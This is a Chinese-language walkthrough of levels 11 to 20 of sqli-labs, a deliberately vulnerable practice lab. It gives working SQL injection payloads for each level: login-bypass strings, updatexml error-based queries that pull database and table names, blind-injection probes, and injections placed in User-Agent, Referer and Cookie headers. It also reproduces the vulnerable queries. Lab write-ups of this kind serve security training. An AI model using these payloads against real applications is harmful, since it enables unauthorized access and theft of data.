sqli-labs（11-20）

第十一关

界面终于换口味啦

登录系统，目测万能密码或者md5

1、先试试万能密码

username=1' or 1#password=123    返回登录成功，用户名密码为id=1时的数据

如果在发包中要对 # 进行url编码    %23

uname=1%27+or+1%23&passwd=123&submit=Submit

2、额但是我要爆库

mysql_fetch_array() 函数从结果集中取得一行作为关联数组，所以虽然本地测试万能密码能得到所有结果，但是该函数只从结果集中取得一行，有点8xing

3、尝试    uname=11'&passwd=1&submit=Submit

出现报错

可以报错注入，但是为什么是这个报错呢？    1' LIMIT 0,1    明明没有在passwd中的1后面加单引号，猜测这个单引号是本来就在的，但是前面那个单引号去哪了，被前面uname本来有的单引号配对走了。验证查询语句

@$sql="SELECT username, password FROM users WHERE username='$uname' and password='$passwd' LIMIT 0,1";

4、构造报错注入

uname=11' and updatexml(1,concat(0x7e,(select database()),0x7e),1) #&passwd=1&submit=Submit

第十二关

1、界面和十一题一样，先尝试万能密码    username=1' or 1#password=123 

发现不行。。。

username=1" or 1#password=123 

报错，应该是注释符出错了，构造    username=1" or 1 and "1"="1&password=1" or 1 and "1"="1

结果为空

通常注释符出错是因为添加了括号，所以利用and

至于上面的万能密码结果为什么为空？

@$sql="SELECT username, password FROM users WHERE username=($uname) and password=($passwd) LIMIT 0,1";

带入变量之后

SELECT username, password FROM users WHERE username=("1" or 1 and "1"="1") and password=("1" or 1 and "1"="1") LIMIT 0,1 

当然，万能密码还是有的，比如    uname=\&passwd=)or 1#&submit=Submit

2、说明存在报错注入，尝试    

uname=11" and updatexml(1,concat(0x7e,(select database()),0x7e),1) and "1"="1&passwd=1&submit=Submit

第十三关

和第十二关类似，把双引号改为单引号即可

第十四关

发现如下都可以

uname=11" and updatexml(1,concat(0x7e,(select database()),0x7e),1) and "1"="1&passwd=1&submit=Submit

uname=11" and updatexml(1,concat(0x7e,(select database()),0x7e),1) #&passwd=1&submit=Submit

源码为

@$sql="SELECT username, password FROM users WHERE username=$uname and password=$passwd LIMIT 0,1";

第十五关

直接在bp尝试 

bool盲注

uname=admin' and 1 --+&passwd=admin&submit=Submit

uname=admin' and 0  --+&passwd=admin&submit=Submit

脚本参考第七关

也可以时间盲注

脚本参考第七关

第十六关

这题又是新的组合。。。

括号+单引号，括号+双引号，单引号，双引号，两个括号+单引号

看了源码才知道怎么闭合。。。

相当于    SELECT username, password FROM users WHERE username=("$uname") and password=("$passwd") LIMIT 0,1

构造    uname=") or 1--+&passwd=a&submit=Submit

第十七关

页面提示

猜测是update操作，猜测sql语句大概为

update users set password=$passwd where username=$uname;

1、尝试

uname=adn&passwd=a&submit=Submit

回显如下，应该是用户名不存在导致更新失败，验证操作应该是对操作影响条数进行判断

2、尝试

uname=a' or 1&passwd=11&submit=Submit    失败

uname=a" or 1&passwd=11&submit=Submit    失败

uname=a')# or 1&passwd=11&submit=Submit    失败

uname=a")# or 1&passwd=11&submit=Submit     失败

3、看看源码把，原来是分两次查询的，而且第一次查找uname还有check函数。。。

4、根据最后一行可以用报错注入，并且过滤函数没有对passwd进行过滤

魔术引号    PHP 5.3.0 起废弃并将自 PHP 5.4.0 起移除。

当打开时，所有的 '（单引号），"（双引号），\（反斜线）和 NULL 字符都会被自动加上一个反斜线进行转义。这和 addslashes() 作用完全相同。

长度不能超过20

其中过滤函数    mysql_real_escape_string()

函数转义SQL 语句中使用的字符串中的特殊字符。

\x00     \n     \r     \     '     "     \x1a 

构造    uname=admin&passwd=1'and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e),1) --+&submit=Submit

这里uname一定要存在，不然无法进入下一次update操作

第十八关

不出意外应该是    insert into    操作记录访问ip

1、查看源代码

2、发现可以报错注入，并且只能通过uagent、ip进行，因为没有进行过滤

首先要登陆成功才能继续。。。

但是ip试了几次不知道为啥不行，

$_server[‘Remote_ADDR’]

用户IP将在HTTP标头中提供（例如X-Forwarded-For、client-ip）

在bp对ua进行修改为    User-Agent:1'

闭合构造    User-Agent:1' and '1'='1

报错注入    1' and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e),1) and '1'='1

第十九关

之后每题都要求先登录。。。并且都是对uname和passwd进行check

和第十八关类似，把注入点从ua改成referer即可

报错注入    1' and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e),1) and '1'='1

第二十关

在登陆成功之后出现了cookie，修改    Cookie: uname=admin'

还是报错注入，构造    1' and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e),1) and '1'='1